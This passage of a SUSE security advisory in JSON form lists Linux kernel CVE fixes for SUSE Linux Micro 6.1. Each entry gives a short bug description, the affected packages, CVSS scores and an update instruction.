"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54303",
"url": "https://www.suse.com/security/cve/CVE-2023-54303"
},
{
"category": "external",
"summary": "SUSE Bug 1255785 for CVE-2023-54303",
"url": "https://bugzilla.suse.com/1255785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54303"
},
{
"cve": "CVE-2023-54304",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54304"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: meson_sm: fix to avoid potential NULL pointer dereference\n\nof_match_device() may fail and returns a NULL pointer.\n\nFix this by checking the return value of of_match_device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54304",
"url": "https://www.suse.com/security/cve/CVE-2023-54304"
},
{
"category": "external",
"summary": "SUSE Bug 1255786 for CVE-2023-54304",
"url": "https://bugzilla.suse.com/1255786"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54304"
},
{
"cve": "CVE-2023-54309",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54309"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: tpm_vtpm_proxy: fix a race condition in /dev/vtpmx creation\n\n/dev/vtpmx is made visible before \u0027workqueue\u0027 is initialized, which can\nlead to a memory corruption in the worst case scenario.\n\nAddress this by initializing \u0027workqueue\u0027 as the very first step of the\ndriver initialization.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54309",
"url": "https://www.suse.com/security/cve/CVE-2023-54309"
},
{
"category": "external",
"summary": "SUSE Bug 1255780 for CVE-2023-54309",
"url": "https://bugzilla.suse.com/1255780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54309"
},
{
"cve": "CVE-2023-54312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsamples/bpf: Fix buffer overflow in tcp_basertt\n\nUsing sizeof(nv) or strlen(nv)+1 is correct.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54312",
"url": "https://www.suse.com/security/cve/CVE-2023-54312"
},
{
"category": "external",
"summary": "SUSE Bug 1255774 for CVE-2023-54312",
"url": "https://bugzilla.suse.com/1255774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54312"
},
{
"cve": "CVE-2023-54313",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54313"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\novl: fix null pointer dereference in ovl_get_acl_rcu()\n\nFollowing process:\n P1 P2\n path_openat\n link_path_walk\n may_lookup\n inode_permission(rcu)\n ovl_permission\n acl_permission_check\n check_acl\n get_cached_acl_rcu\n\t ovl_get_inode_acl\n\t realinode = ovl_inode_real(ovl_inode)\n\t drop_cache\n\t\t __dentry_kill(ovl_dentry)\n\t\t\t\tiput(ovl_inode)\n\t\t ovl_destroy_inode(ovl_inode)\n\t\t dput(oi-\u003e__upperdentry)\n\t\t dentry_kill(upperdentry)\n\t\t dentry_unlink_inode\n\t\t\t\t upperdentry-\u003ed_inode = NULL\n\t ovl_inode_upper\n\t upperdentry = ovl_i_dentry_upper(ovl_inode)\n\t d_inode(upperdentry) // returns NULL\n\t IS_POSIXACL(realinode) // NULL pointer dereference\n, will trigger an null pointer dereference at realinode:\n [ 205.472797] BUG: kernel NULL pointer dereference, address:\n 0000000000000028\n [ 205.476701] CPU: 2 PID: 2713 Comm: ls Not tainted\n 6.3.0-12064-g2edfa098e750-dirty #1216\n [ 205.478754] RIP: 0010:do_ovl_get_acl+0x5d/0x300\n [ 205.489584] Call Trace:\n [ 205.489812] \u003cTASK\u003e\n [ 205.490014] ovl_get_inode_acl+0x26/0x30\n [ 205.490466] get_cached_acl_rcu+0x61/0xa0\n [ 205.490908] generic_permission+0x1bf/0x4e0\n [ 205.491447] ovl_permission+0x79/0x1b0\n [ 205.491917] inode_permission+0x15e/0x2c0\n [ 205.492425] link_path_walk+0x115/0x550\n [ 205.493311] path_lookupat.isra.0+0xb2/0x200\n [ 205.493803] filename_lookup+0xda/0x240\n [ 205.495747] vfs_fstatat+0x7b/0xb0\n\nFetch a reproducer in [Link].\n\nUse the helper ovl_i_path_realinode() to get realinode and then do\nnon-nullptr checking.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54313",
"url": "https://www.suse.com/security/cve/CVE-2023-54313"
},
{
"category": "external",
"summary": "SUSE Bug 1255775 for CVE-2023-54313",
"url": "https://bugzilla.suse.com/1255775"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54313"
},
{
"cve": "CVE-2023-54314",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54314"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: af9005: Fix null-ptr-deref in af9005_i2c_xfer\n\nIn af9005_i2c_xfer, msg is controlled by user. When msg[i].buf\nis null and msg[i].len is zero, former checks on msg[i].buf would be\npassed. Malicious data finally reach af9005_i2c_xfer. If accessing\nmsg[i].buf[0] without sanity check, null ptr deref would happen.\nWe add check on msg[i].len to prevent crash.\n\nSimilar commit:\ncommit 0ed554fd769a\n(\"media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54314",
"url": "https://www.suse.com/security/cve/CVE-2023-54314"
},
{
"category": "external",
"summary": "SUSE Bug 1255776 for CVE-2023-54314",
"url": "https://bugzilla.suse.com/1255776"
}
],
"remediations": [
{
"category": "vendor_fix",
